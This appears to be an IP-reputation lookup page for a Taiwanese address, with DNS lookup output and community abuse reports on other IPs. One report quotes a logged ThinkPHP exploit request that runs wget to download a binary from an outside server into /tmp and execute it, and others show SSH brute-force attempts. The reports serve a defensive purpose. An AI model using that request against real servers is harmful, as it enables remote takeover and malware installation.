Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: Taiwan (Province of China)

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 111.80.168.213
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 63413
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;111.80.168.213.			IN	A

;; AUTHORITY SECTION:
.			217	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2024081500 1800 900 604800 86400

;; Query time: 48 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Aug 15 17:58:09 CST 2024
;; MSG SIZE  rcvd: 107
Host info
213.168.80.111.in-addr.arpa domain name pointer 111-80-168-213.emome-ip.hinet.net.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
213.168.80.111.in-addr.arpa	name = 111-80-168-213.emome-ip.hinet.net.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
110.136.94.184 attackbots
Automatic report - Port Scan Attack
2019-10-18 23:01:04
158.69.210.117 attack
$f2bV_matches
2019-10-18 23:08:25
49.88.112.111 attack
Oct 18 16:56:03 vps647732 sshd[23676]: Failed password for root from 49.88.112.111 port 25618 ssh2
...
2019-10-18 23:15:45
122.170.72.246 attack
GET /index.php?s=/index/	hink■pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://192.99.55.18/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86'
2019-10-18 23:05:58
193.47.72.15 attackbotsspam
Oct 18 16:22:18 vps647732 sshd[23258]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=193.47.72.15
Oct 18 16:22:20 vps647732 sshd[23258]: Failed password for invalid user qwe!@#QWE from 193.47.72.15 port 34078 ssh2
...
2019-10-18 22:55:18
5.35.68.32 attackspam
IP Ban Report : https://help-dysk.pl/wordpress-firewall-plugins/ip/5.35.68.32/ 
 RU - 1H : (157)  
 Protection Against DDoS WordPress plugin :  
 "odzyskiwanie danych help-dysk" 
 IP Address Ranges by Country : RU 
 NAME ASN : ASN31514 
 
 IP : 5.35.68.32 
 
 CIDR : 5.35.0.0/17 
 
 PREFIX COUNT : 14 
 
 UNIQUE IP COUNT : 139520 
 
 
 WYKRYTE ATAKI Z ASN31514 :  
  1H - 1 
  3H - 1 
  6H - 1 
 12H - 1 
 24H - 1 
 
 DateTime : 2019-10-18 13:39:35 
 
 INFO : Port Scan TELNET Detected and Blocked by ADMIN  - data recovery
2019-10-18 23:26:09
84.42.47.124 attackspambots
Portscan or hack attempt detected by psad/fwsnort
2019-10-18 23:28:27
2.235.234.64 attackspambots
firewall-block, port(s): 8081/tcp
2019-10-18 23:14:04
114.67.80.161 attack
Automatic report - Banned IP Access
2019-10-18 23:26:28
118.244.196.123 attackspambots
Automatic report - Banned IP Access
2019-10-18 23:07:15
5.64.19.208 attackbotsspam
firewall-block, port(s): 9090/tcp
2019-10-18 23:12:28
106.201.238.226 attackbots
firewall-block, port(s): 1433/tcp
2019-10-18 23:07:40
213.32.21.139 attack
2019-10-18T14:53:00.965782abusebot-2.cloudsearch.cf sshd\[20621\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.ip-213-32-21.eu  user=root
2019-10-18 23:22:44
198.46.160.56 attack
Forged login request.
2019-10-18 23:13:34
51.79.129.237 attackbots
2019-10-18T14:34:18.297264abusebot-5.cloudsearch.cf sshd\[21234\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=ip237.ip-51-79-129.net  user=root
2019-10-18 22:59:04

Recently Reported IPs

111.82.24.72 111.83.149.219 111.80.180.91 111.82.121.178
111.82.128.111 111.82.128.121 111.82.161.243 111.81.118.105
111.81.187.188 111.80.196.11 111.80.63.246 111.81.161.240
111.80.70.169 111.81.219.13 111.82.16.220 111.80.26.20
111.8.90.250 111.80.145.241 111.80.166.44 111.80.149.64